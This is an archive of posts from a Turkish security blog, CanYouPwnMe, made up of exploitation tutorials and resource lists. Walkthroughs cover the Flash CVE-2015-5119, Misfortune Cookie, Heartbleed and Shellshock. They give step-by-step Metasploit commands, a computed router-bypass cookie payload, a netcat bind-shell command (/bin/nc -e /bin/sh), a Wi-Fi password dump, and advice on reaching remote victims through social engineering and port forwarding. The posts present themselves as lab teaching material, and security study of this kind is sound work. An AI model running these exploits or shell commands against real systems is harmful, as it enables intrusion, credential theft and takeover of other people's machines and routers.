exploit arşivleri • CanYouPwnMe! - For Cyber Security Researchers https://canyoupwn.me cypm! Sat, 21 Sep 2019 20:24:02 +0000 tr hourly 1 https://wordpress.org/?v=6.0 https://canyoupwn.me/wp-content/uploads/2016/02/cropped-Başlıksız-1-32x32.png exploit arşivleri • CanYouPwnMe! - For Cyber Security Researchers https://canyoupwn.me 32 32 TR | Adobe Flash Player Hacking Team Exploit (CVE-2015-5119) https://canyoupwn.me/tr-hacking-team-exploit-cve-2015-5119/ https://canyoupwn.me/tr-hacking-team-exploit-cve-2015-5119/#respond Wed, 13 Apr 2016 06:30:43 +0000 https://canyoupwn.me/?p=1666 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Hacking Team ve CVE-2015-5119 hakkında: Bu yazıda, 6 Temmuz 2015′ i 7 Temmuz 2015′ e bağlayan gece sızdırılan 400 GB boyutundaki Hacking Team dosyaları içerisinde bulunan Adobe Flash Player sıfırıncı gün zafiyetlerinden CVE-2015-5119‘ un Metasploit modülü ile sömürülmesi anlatılacaktır. Hacking Team ile ilgili daha fazla bilgiye wikipedia üzerinden; sızdırılmış e-postalara wikileaks üzerinden ve CVE-2015-5119 numaralı Adobe Flash […]

TR | Adobe Flash Player Hacking Team Exploit (CVE-2015-5119) Cem Onat Karagün

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Hacking Team ve CVE-2015-5119 hakkında:

Bu yazıda, 6 Temmuz 2015′ i 7 Temmuz 2015′ e bağlayan gece sızdırılan 400 GB boyutundaki Hacking Team dosyaları içerisinde bulunan Adobe Flash Player sıfırıncı gün zafiyetlerinden CVE-2015-5119‘ un Metasploit modülü ile sömürülmesi anlatılacaktır.

Hacking Team ile ilgili daha fazla bilgiye wikipedia üzerinden; sızdırılmış e-postalara wikileaks üzerinden ve CVE-2015-5119 numaralı Adobe Flash Player uzaktan komut çalıştırma zafiyeti hakkında daha fazla bilgiye buradan ulaşılabilir. Hacking Team dosyalarındaki diğer exploitlere de buradan ulaşılabilir.

Adobe Security Bulletin üzerinde bahsedildiği gibi zafiyet, Windows, Macintosh ve Linux işletim sistemlerindeki Adobe Flash Player 18.0.0.194 önceki versiyonlarını etkilemekte ve saldırganın sistem üzerinde hakimiyet kurmasına sebebiyet vermektedir.
Lab ortamı hakkında:

Yazıda, Internet Explorer web tarayıcısı üzerinde Adobe Flash Player 18.0.0 versiyonu çalışan Windows 8.1 Pro işletim sistemi kurulu bilgisayar kurban olarak; Metasploit kurulu gelen Kali Linux 2.0 işletim sistemi de saldırgan olarak kullanılmıştır.

Siz de istediğiniz Flash Player versiyonu buradan indirebilirsiniz. Programların eski versiyonlarını sunan online hizmet oldversion.com da benzeri uygulamalar için oldukça kullanışlıdır. Tarayıcı üzerinde çalışan Flash Player versiyonunu öğrenmek için bu sayfadan Check Now’ a basılabilir.

 

Metasploit’ e yeni modül kurulumu:

  • Swf sample ve modülü  indirip, /usr/share/metasploit-framework/modules (Kali 2.0 için) dizini altında tercihen yeni bir dizine eklemeniz gerekmektedir. Aynı iş kısa yoldan komutlar ile yapılacak olursa sırasıyla:
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/data/exploits/CVE-2015-5122/msf.swf

 

wget http://downloads.securityfocus.com/vulnerabilities/exploits/75568.rb

 

mkdir -p /usr/share/metasploit-framework/modules/exploits/hackingteamcypm

 

mv 75568.rb /usr/share/metasploit-framework/modules/exploits/hackingteamcypm/flashcypm.rb

 

mv msf.swf /usr/share/metasploit-framework/modules/exploits/hackingteamcypm/msf.swf

 

rm 75568.rb msf.swf
  • İşlemin ardından PostgreSQL servisi çalışmıyorsa başlatılmalı çalışıyorsa yeniden başlatılmalıdır.
service postgresql start

veya

service postgresql restart
  • Metasploit terminal uygulaması açılıp modüllerin yeniden yüklenmesi sağlanmalıdır. Msfconsole komutları ile ilgili daha detaylı bilgiye buradan ulaşılabilir.
msfconsole
reload_all
  • Metasploit terminal uygulaması msfconsole üzerinden arama yaparak modülün eklendiği teyit edilebilir.
search flashcypm

 

Exploit’ in kullanımı:

Msfconsole üzerinden kurulum aşamasında “search flashcypm” komutu ile araması yapılıp kurulumunun teyit edildiği modülün kullanımı için “use” komutu kullanılır:

use flashcypm

Modül hakkında daha fazla bilgi alabilmek için “info” komutu kullanılabilir.

cypm

 

Modülün gereken parametrelerini öğrenmek için “show options” kullanılır. Burada Required sütunu gerekli olan parametrelere işaret etmektedir. Örneğin URIPATH değeri kullanılması zorunlu değildir. Fakat tercihen yazıda rastgele URIPATH kullanılması yerine “canyoupwnme” kullanılmıştır:

set URIPATH canyoupwnme

Exploitin çalışması için son olarak  “exploit” komutu verilir.

cypm2

Kurbanın linke giriş yapmasına olanak sağlanır(Sosyal mühendislik senaryoları.). Bu yazıda linke tıklanıldığı varsayılarak kurban tarafındaki görüntü eklenmiştir:

cypm

Saldırgan makine üzerindeki msfconsole terminalinde meterpreter oturumunun açıldığı görülmektedir, oturumları listelemek için “sessions” komutu verilir. Oturumu seçmek için ID değerine bakılır, örneğin bu yazıda ID değeri 1 olan oturum seçildiği için “sessions -i 1” komutu verilmiştir:

 

cypm

 

Meterpreter üzerinden ekran görüntüsü, webcam üzerinden resim çekmek veya klavye tuşları kayıt etmek gibi özellikleri kullanmak için “help” komutu kullanılabilir.

MS-DOS Komut satırı için “shell” komutu kullanılmıştır:

cypm

Sistemde başarı ile uzaktan komut çalıştırılmış olup bundan sonra yapılabilecekler saldırganın hayal gücü ile sınırlıdır.

Örneğin, tek komut ile wi-fi şifresinin elde edilmesi:

netsh wlan show profile name=SSID-ADI key=clear | findstr " Key Content"

SSID adını öğrenmek için de:

netsh wlan show interfaces | findstr "Profile"

 

Bonus:

Yazıdan anlaşılabileceği üzere sistem güvenliği adına; gereksiz tüm servislerin kaldırılması, mümkün olduğunca az servise ihtiyaç duyulması ve kullanılan servislerin güncel olması gerekmektedir.

Lokal ağınız dışında uzaktaki bir hedefe yapılan saldırı için router’ ınız (modem) üzerinde port yönlendirme ayarları yapmanız gerekmektedir ve msfconsole üzerinde exploit çalıştırılmadan önce “set SRVHOST” komutu ile router’ ın external IP adresi(internet yoluyla erişilebilen) belirtilmelidir.

Bu da Hacking Team’ in ekonomi sınıfında THY ile uçtuğunun kanıtıdır:
https://wikileaks.org/hackingteam/emails/emailid/830597

 

 

TR | Adobe Flash Player Hacking Team Exploit (CVE-2015-5119) Cem Onat Karagün

]]>
https://canyoupwn.me/tr-hacking-team-exploit-cve-2015-5119/feed/ 0
TR | Misfortune Cookie (CVE-2014-9222) Analizi https://canyoupwn.me/tr-misfortune-cookie-cve-2014-9222-analizi/ https://canyoupwn.me/tr-misfortune-cookie-cve-2014-9222-analizi/#respond Sat, 26 Mar 2016 07:30:37 +0000 https://canyoupwn.me/?p=1236 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Bu yazımızda sizlerle etki alanı oldukça geniş olan ve yüksek risk içeren bir zafiyeti inceleyeceğiz. Misfortune Cookie olarak adlandırılan zafiyet routerlarda web arayüzü sunmak için kullanılan Allegro Rompager adlı gömülü web server uygulamasında bulunuyor. Bu yazılımın birçok marka/model routerda kullanılması zafiyetin etki alanını bir hayli genişletiyor. Zafiyet aracılığıyla saldıgan herhangi bir şifreye ihtiyaç duymadan router’ın […]

TR | Misfortune Cookie (CVE-2014-9222) Analizi CanYouPwnMe

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

cm

Bu yazımızda sizlerle etki alanı oldukça geniş olan ve yüksek risk içeren bir zafiyeti inceleyeceğiz. Misfortune Cookie olarak adlandırılan zafiyet routerlarda web arayüzü sunmak için kullanılan Allegro Rompager adlı gömülü web server uygulamasında bulunuyor. Bu yazılımın birçok marka/model routerda kullanılması zafiyetin etki alanını bir hayli genişletiyor. Zafiyet aracılığıyla saldıgan herhangi bir şifreye ihtiyaç duymadan router’ın web kontrol paneline erişim sağlayabiliyor. Bu da zafiyeti oldukça riskli bir hale getiriyor. Hadi incelemeye başlayalım.

NOT: Yazıda kullanılan kod parçaları ve görseller alıntıdır.

 

0x00: Zafiyet Tespiti

Zafiyetimizin istismar vektörü, adından da anlaşılacağı gibi, cookie verisi. Gelin önce sunucuya gönderilen cookie değerine bir bakalım.

req

Gönderilen cookie’nin formatı “CX=value” şeklinde. Bunun sebebini web server’ın cookie’yi parse eden kısmına bakınca daha iyi anlıyoruz.

ROM:8010E5B0 loc_8010E5B0:                            # CODE XREF: sub_8010E574+EC j
 ROM:8010E5B0                 li      $t7, 0x43        # 0x43='C'
 ROM:8010E5B4                 bne     $v0, $t7, loc_8010E618
 ROM:8010E5B8                 li      $a1, 0x3D
 ROM:8010E5BC                 addiu   $s0, 1
 ROM:8010E5C0                 move    $a0, $s0       
 ROM:8010E5C4                 jal     sub_8016C340
 ROM:8010E5C8                 nop
 ROM:8010E5CC                 move    $a0, $s0       
 ROM:8010E5D0                 move    $s1, $v0       
 ROM:8010E5D4                 addiu   $s1, 1
 ROM:8010E5D8                 jal     sub_801F2E74
 ROM:8010E5DC                 sb      $zero, -1($s1) 
 ROM:8010E5E0                 move    $a0, $s1       
 ROM:8010E5E4                 jal     sub_8016CA24
 ROM:8010E5E8                 move    $s3, $v0       
 ROM:8010E5EC                 li      $a2, 0x28
 ROM:8010E5F0                 mul     $t2, $s3, $a2   
 ROM:8010E5F4                 move    $a1, $s1       
 ROM:8010E5F8                 addiu   $t5, $s4, 0x6B28
 ROM:8010E5FC                 move    $s0, $v0
 ROM:8010E600                 addu    $at, $s1, $s0   
 ROM:8010E604                 addu    $a0, $t5, $t2   
 ROM:8010E608                 jal     sub_8016A784
 ROM:8010E60C                 sb      $zero, 0($at)
 ROM:8010E610                 j       loc_8010E644   
 ROM:8010E614                 addu    $s0, $s1, $s0
 ROM:8010E618  # ---------------------------------------------------------------------------

 

Yukarıdaki MIPS Assembly kodlarını anlamakta sıkıntı çekiyorsanız (ben çektim) şu kaynaklara göz gezdirmenizi öneririm:

MIPS Quick Tutorial

MIPS Instruction Set

Burada yapılan işlemler özetle şu şekilde (“CX=value” formatını hatırlayın);

  • Ilk karakter ‘C’ ye eşitmi?
  • Evet ise => “X=value” olan kısmı al
  • ‘=’ ayracı ile string’i iki kısıma ayır (“X” ve “value”)
  • *(0x6B28 + X*0x28) = value

 

Son adım bana biyerden tanıdık geliyor..

  • *(base_addr + i*sizeof(item)) = value

Bu pattern x86 mimarisinde de sıklıkla karşılaştığım dizi elemanlarına erişme pattern’i. (bkz: x86 Asm Cheat Sheet). Buradan anlaşılacağı üzere gönderdiğimiz cookie’ler, her elemanı 40 byte olan -nitekim cookie ile gönderilen değerimiz 40 karakter- bir dizide tutuluyor. Biz sunucuya “C0=blabla” şeklinde bir cookie gönderdiğimizde aslında cookie dizisinin 0. indexine “blabla” değerini yazmış oluyoruz. Uygulama girdiyi alırken herhangi bir sınır kontrolü yapmadığı içinde write-what-where durumu oluşuyor (yani istediğimiz adrese istediğimiz değeri yazabiliyoruz).

Zafiyeti tanımladığımıza göre şimdi istismarına geçelim.

 

0x10: Exploitation

ZynOS‘in zafiyeti istismar etmemizi kolaylaştıracak bir özelliği var; pswauthen. Komut arayüzünden bu komutu ‘0’ argümanıyla birlikte girdiğiniz takdirde geçici bir süre için web arayüzüne şifresiz erişim sağlayabiliyorsunuz. Komutun yaptığı şey ise belli bir adresteki flag değerini sıfıra eşitlemek. Daha sonradan Rompager bu adresteki değere bakıp 0’ı gördüğünde kullanıcıya şifresiz erişim sağlıyor. Bu da demek oluyor ki elimizdeki zafiyeti kullanarak bu adresin içerisini sıfırlayıp modem arayüzüne şifresiz şekilde erişebiliriz! Tek yapmamız gereken flag adresi ile dizinin adresi arasındaki farkı bulup 40’a bölmek ve bunu uygun cookie formatında yazıp request halinde sunucuya göndermek.

  • 0x8034FF94 – 0x804163D4 = 0xFFF39BC0
  • 0xFFF39BC0 / 0x28 = 0x0666171
  • 0x06661718 = 107353880 (indis karşılığı)

Göndermemiz gereken cookie değeri: “C107353880=\0”

Cookie değeri null-byte içereceğinden request’i netcat ile göndermeniz gerekir.

aaasss

Böylece zafiyetimizi istismar etmiş olduk.

Bu zafiyeti kullanan bir malware salgını hakkında yazdığım raporu buradan okuyabilirsiniz.

 

Kaynakça:
  1. http://mis.fortunecook.ie/
  2. http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf
  3. http://cawanblog.blogspot.com.tr/2015/02/misfortune-cookie-cve-2014-9222.html

TR | Misfortune Cookie (CVE-2014-9222) Analizi CanYouPwnMe

]]>
https://canyoupwn.me/tr-misfortune-cookie-cve-2014-9222-analizi/feed/ 0
TR | Awesome Learn Web Security https://canyoupwn.me/awesome-learn-web-app-sec/ https://canyoupwn.me/awesome-learn-web-app-sec/#respond Tue, 22 Mar 2016 07:10:48 +0000 https://canyoupwn.me/?p=1104 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Exploit Kaynakları : Exploit – DB – The most known vulnerability DB 0day.today – Inj3ct0r Team’s Vulnerability DB Packet Storm Security – Global Security Vulnerability DB Vuln WP Database – WPScan’s Vulnerability DB   Kitaplar : The Web Application Hacker’s Handbook: Finding and Exploiting Security Flaws Hacking Exposed Web Applications Hacking Web Apps: Detecting and […]

TR | Awesome Learn Web Security CanYouPwnMe

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

  • Exploit Kaynakları :

Exploit – DB – The most known vulnerability DB

0day.today – Inj3ct0r Team’s Vulnerability DB

Packet Storm Security – Global Security Vulnerability DB

Vuln WP Database – WPScan’s Vulnerability DB

 

  • Kitaplar :

The Web Application Hacker’s Handbook: Finding and Exploiting Security Flaws

Hacking Exposed Web Applications

Hacking Web Apps: Detecting and Preventing Web Application Security Problems

The Tangled WEB: A Guide to Securing Modern Web Applications

SQL Injection Attacks and Defense

Web Application Obfuscation: ‘-/WAFs..Evasion..Filters//alert(/Obfuscation/)-‘

XSS Attacks: Cross Site Scripting Exploits and Defense

The Browser Hacker’s Handbook

The Basics of Web Hacking: Tools and Techniques to Attack the Web

Web Penetration Testing with Kali Linux

Web Application Security, A Beginner’s Guide

 

  • Araçlar :

 

Netsparker

Xenotix XSS Exploit Framework

TrustKeeper

SOAtest

Vega

Grabber

wFuzz

Wapiti

DirBuster

Nikto

Wikto ( Nikto’s Windows Version)

SkipFish

WebScarab

w3af

BeeF Framework

SQLMap

OWASP Zap

Burp Suite

Metasploit

 

  • Online Kurslar :

Offensive Computer Security

Offensive Network Security

Security Tube

Security Trainings

Woz-U

 

  • Cheat Sheets :

SQL Injection Cheat Sheets:

SQL Injection Cheat Sheet

 

XSS Cheat Sheets:

Filter Evasion by OWASP

Our Favorite XSS Filters and How to Attack Them

OWASP XSS Cheat Sheet

Lots of XSS Payloads

XSS Cheat Sheet from Adobe

 

 

TR | Awesome Learn Web Security CanYouPwnMe

]]>
https://canyoupwn.me/awesome-learn-web-app-sec/feed/ 0
TR | Awesome Learn Malware Analysis https://canyoupwn.me/tr-awesome-learn-malware-analysis/ https://canyoupwn.me/tr-awesome-learn-malware-analysis/#respond Mon, 21 Mar 2016 07:30:52 +0000 https://canyoupwn.me/?p=1137 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

  Statik Analiz Araçları: Mastiff – Online CFF Explorer Suite Pestudio Strings2 Objdump PEframe PEInsider   Dinamik Analiz Araçları: Windbg IDA Pro gdb/edb Radare2 Volatility HxD wxHexEditor Nagios Wireshark Process Monitor Process Explorer Autoruns RegShot NetworkMiner Fiddler   OS: REMnux SIFT Workstation   Online Sandbox Servisleri: ISECLAB Wepawet XecScan Anubis Malwr Comodo Instant Malware Analysis VirusTotal […]

TR | Awesome Learn Malware Analysis CanYouPwnMe

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

 

Statik Analiz Araçları:

 

Dinamik Analiz Araçları:

 

OS:

 

Online Sandbox Servisleri:

 

Tutorials:

Online Kurslar :

 

Cheat Sheets :

 

Kitaplar:

 

 

 

 

TR | Awesome Learn Malware Analysis CanYouPwnMe

]]>
https://canyoupwn.me/tr-awesome-learn-malware-analysis/feed/ 0
TR | Awesome Learn Pentesting https://canyoupwn.me/tr-awesome-penetration-testing/ https://canyoupwn.me/tr-awesome-penetration-testing/#respond Wed, 09 Mar 2016 07:00:59 +0000 https://canyoupwn.me/?p=709 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Online Kaynaklar: Sızma Testi Kaynakları Metasploit Unleashed – Ücretsiz Metasploit Kursları PTES – Sızma Testi Standartları OWASP – Web Uygulama Güvenliği Projesi   Shellcode Geliştirme Shellcode Örnekleri – Shellcode Veritabanı   Sosyal Mühendislik Kaynakları Kilit Kırma Kaynakları Schuyler Towne Youtube Channel – Kilit Kırma Teknikleri Reddit Lockpicking – Kilit Kırma Teknikleri ve Araç Önerileri   Araçlar Sızma Testi Dağıtımları Kali BlackArch […]

TR | Awesome Learn Pentesting Mustafa Kaan Demirhan

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Online Kaynaklar:

Sızma Testi Kaynakları

 

Shellcode Geliştirme

 

Sosyal Mühendislik Kaynakları

Kilit Kırma Kaynakları

Schuyler Towne Youtube Channel – Kilit Kırma Teknikleri

Reddit Lockpicking – Kilit Kırma Teknikleri ve Araç Önerileri

 

Araçlar

Sızma Testi Dağıtımları

 

Basit Sızma Testi Araçları

 

Zafiyet Tarama Araçları

  • Netsparker – Web Uygulama Güvenliği Tarama Aracı
  • Nexpose – Zafiyet/Risk Yönetimi Aracı
  • Nessus – Zafiyet Yapılandırma, Denetleme Aracı
  • OpenVAS -Açık Kaynaklı Zafiyet Tarama Aracı
  • OWASP Zed Attack Proxy – Web Uygulama Zafiyet Tarama Aracı
  • Secapps – Entegre Web Uygulama Güvenliği Test Ortamı
  • w3af – Web Uygulama Saldırı Aracı
  • Wapiti – Web Uygulama Zafiyet Tarama Aracı
  • Webreaver – Web Uygulama Zafiyet Tarama Aracı

 

Ağ Araçları

  • nmap – Ağ Haritası Çıkarmak, Çalışan Hizmetleri…vb. Bilgileri Elde Etmemize Yardımcı Olur
  • tcpdump – Paket Analizi Yapmamıza Yardımcı Olur
  • Wireshark – Ağ Protokol Analiz Aracı
  • Network Tools – Yaygın Olarak Kullanılan Ağ Araçları
  • netsniff-ng – Ağ Dinleme Aracı
  • SPARTA – Ağ Protokol Analiz Aracı

 

Kablosuz Ağ Araçları

  • Aircrack-ng – Kablosuz Ağ Trafiği Dinleme Aracı
  • KISMET – Kablosuz Ağ Dinleme Aracı
  • Reaver – Kaba Kuvvet Saldırı Aracı

 

SSL Analiz Araçları

  • SSLyze – SSL YapılandırmasI Tarama Aracı
  • sslstrip – https Saldırı Aracı

 

HEX Düzenleme

  • Hexed – Tarayıcı Tabanlı Hex Analiz Aracı

 

Kırma Araçları

 

Windows Araçları

 

DDoS Araçları

 

Sosyal Mühendislik Araçları

  • SET – Sosyal Mühendislik Araç Kiti

 

OSInt Araçları

  • Maltego – Aktif ve Pasif Bilgi Toplama Aracı

 

Gizlilik Araçları

  • Tor – Onion Yönlendirme İle Ağda Kimliğinizi Gizlemeye Yarar
  • I2P – The Invisible Internet Project

 

Tersine Mühendislik Araçları

 

Kitaplar

Sızma Testi Kitapları

 

Hacker ın El Kitabı Serisi

 

Ağ Analiz Kitapları

 

Tersine Mühendislik Kitapları

Zararlı Analiz Kitapları

Windows Kitapları

Sosyal Mühendislik Kitapları

Kilit Kırma Kitapları

 

Zafiyet Veritabanları

 

Güvenlik Kursları

 

Ctf Kütüphaneleri

 

Bilgi Güvenliği Konferansları

 

En Yaygın 125 Ağ Güvenliği Aracı

 

 

TR | Awesome Learn Pentesting Mustafa Kaan Demirhan

]]>
https://canyoupwn.me/tr-awesome-penetration-testing/feed/ 0
TR | How to exploit Heartbleed with Metasploit https://canyoupwn.me/heartbleed-acigi-metasploit-yardimiyla-kullanilmasi/ https://canyoupwn.me/heartbleed-acigi-metasploit-yardimiyla-kullanilmasi/#respond Mon, 07 Mar 2016 07:02:44 +0000 https://canyoupwn.me/?p=996 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Merhaba arkadaşlar aslında bugünlerde bu zafiyete sıklıkla rastlanmaz ancak her eski zafiyet gibi bir çok sistemde de bulunması muhtemel. Heartbleed Zafiyeti Nedir ? HTTPS den bahsedersek.Kısaca sizin gönderdiğiniz verilerin çok güçlü bir şifreleme metoduyla şifrelenmesi anlamına gelir. Bu da bağlantılarda sunucu ile aranıza giricek kişilerin sizden herhangi bir veri yakalayamayacağı anlamına gelir. Bankalar, Facebook, Twitter, […]

TR | How to exploit Heartbleed with Metasploit Enes ERGÜN

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Merhaba arkadaşlar aslında bugünlerde bu zafiyete sıklıkla rastlanmaz ancak her eski zafiyet gibi bir çok sistemde de bulunması muhtemel.

Heartbleed Zafiyeti Nedir ?

HTTPS den bahsedersek.Kısaca sizin gönderdiğiniz verilerin çok güçlü bir şifreleme metoduyla şifrelenmesi anlamına gelir. Bu da bağlantılarda sunucu ile aranıza giricek kişilerin sizden herhangi bir veri yakalayamayacağı anlamına gelir. Bankalar, Facebook, Twitter, Bir çok büyük kuruluş hatta farkettiyseniz canyoupwn.me adresinde de kullanılıyor.

Bakın yukarıda verdiğim örnekler arasında bankalar, alışveriş siteleri var ve bu katmanda çıkacak herhangi bir açığın ne denli önemli olabileceğini düşünebiliyor musunuz ? Heartbleed açığı da o yüzden bu kadar ses getirmişti. Hatta o dönem The Fappening olayıyla çoğu ünlünün fotoğrafları internete düştüğünde bunun gerisinde kalmıştı en azından güvenlik sektöründe…

Not:Öncelikle bu açık sayesinde hafızadan rastgele bilgiler çekilir, her zaman başarıya ulaşamayabilirsiniz.
Şimdi lafı uzatmadan yapılacak işlemleri görelim.
İlk önce hedef sisteme bir port taraması yapılması gerekiyor ancak NSE scripti ile birlikte yapılırsa daha sağlıklı sonuç alınacaktır.

nmap -sV --script=ssl-heartbleed hedefIP 

Bu scripti ilk kez kullanıyorsanız sizde de büyük ihtimal aşağıda ki gibi bir hata vericektir.
Seçim_013

Bu hatayı çözmek için öncelikle aşağıda ki adrese girip nmap scriptini indirelim.

https://nmap.org/nsedoc/scripts/ssl-heartbleed.html 

Seçim_014

Daha sonra bu scripti yukarıda gördüğünüz gibi:

 /usr/share/nmap/scripts 

içine atın.

Bunu ister terminal ile istersenizde file browser ile atabilirsiniz.
Şimdi hadi scripti kullanarak taratalım.
Seçim_016

Gördüğünüz gibi 3443 portunda çalışan ssl/http portunda ssl-heartbeed zafiyeti var. 3443 portunu aklınızda tutun lazım olucak 🙂

Şimdi bizim için işleri otomatikleştiren ve kolaylaştıran Metasploit Framework’u açıyoruz . Terminale msfconsole yazabilirsiniz.

Seçim_017

Metasploit’e giriş yaptıkdan sonra “search heartbleed” yazıp kullanabiliceğimiz araçları görebilirsiniz.
Seçim_018

use auxiliary/scanner/ssl/openssl_heartbleed 

aracımıza girdikten sonra show options yazıyoruz ve aşağıda ki komutları giriyoruz.

set rhosts hedefIP 
set verbose true 
set rport 3443 

Ardından “run” komutunu çalıştırarak auxiliary aracını tetikliyoruz.

Seçim_019

Server tarafından hafızadan çekilen (leak) edilen veriyi görüyorsunuz.
Tekrar hatırlatmak isterim :
Not:Öncelikle bu açık sayesinde hafızadan rastgele bilgiler çekilir her zaman başarıya ulaşamayabilirsiniz.

TR | How to exploit Heartbleed with Metasploit Enes ERGÜN

]]>
https://canyoupwn.me/heartbleed-acigi-metasploit-yardimiyla-kullanilmasi/feed/ 0
EN | How to Hack the Shellshock Vulnerability with Metasploit Framework https://canyoupwn.me/en-how-to-hack-the-shellshock-vulnerability-with-metasploit-framework/ https://canyoupwn.me/en-how-to-hack-the-shellshock-vulnerability-with-metasploit-framework/#respond Thu, 04 Feb 2016 00:48:16 +0000 http://canyoupwn.me/?p=301 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

What is Shellshock?  Shellshock, also known as Bashdoor, is a family of security bugs in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash […]

EN | How to Hack the Shellshock Vulnerability with Metasploit Framework Mustafa Kaan Demirhan

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

What is Shellshock? 

Shellshock, also known as Bashdoor, is a family of security bugs in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.

How to use?

  • Start the Metasploit Framework;
msfconsole
  • Search exploit;
search shellshock
  • Run the exploit;
use auxiliary/server/dhclient/dhclient_bash_env
  • We need these parameters “CMD” , “SRVHOST” VE “NETMASK”;
info
  • To view options;
show options
  • Set the DHCP server IP. This is the SRVHOST parameter;
set SVRHOST 192.168.131.61
  • Set the CMD;
set CMD /bin/nc -l -p6996 -e /bin/sh
  •  Set the NETMASK;
set NETMASK 255.255.255.0
  • Run the module;
exploit
  • Connect to the Exploited System;
c::\nc 192.168.131.61 6996
  • Returns the network settings of the exploited Linux system;
ifconfig
  • Confirm the privilage;
    whoami

 

EN | How to Hack the Shellshock Vulnerability with Metasploit Framework Mustafa Kaan Demirhan

]]>
https://canyoupwn.me/en-how-to-hack-the-shellshock-vulnerability-with-metasploit-framework/feed/ 0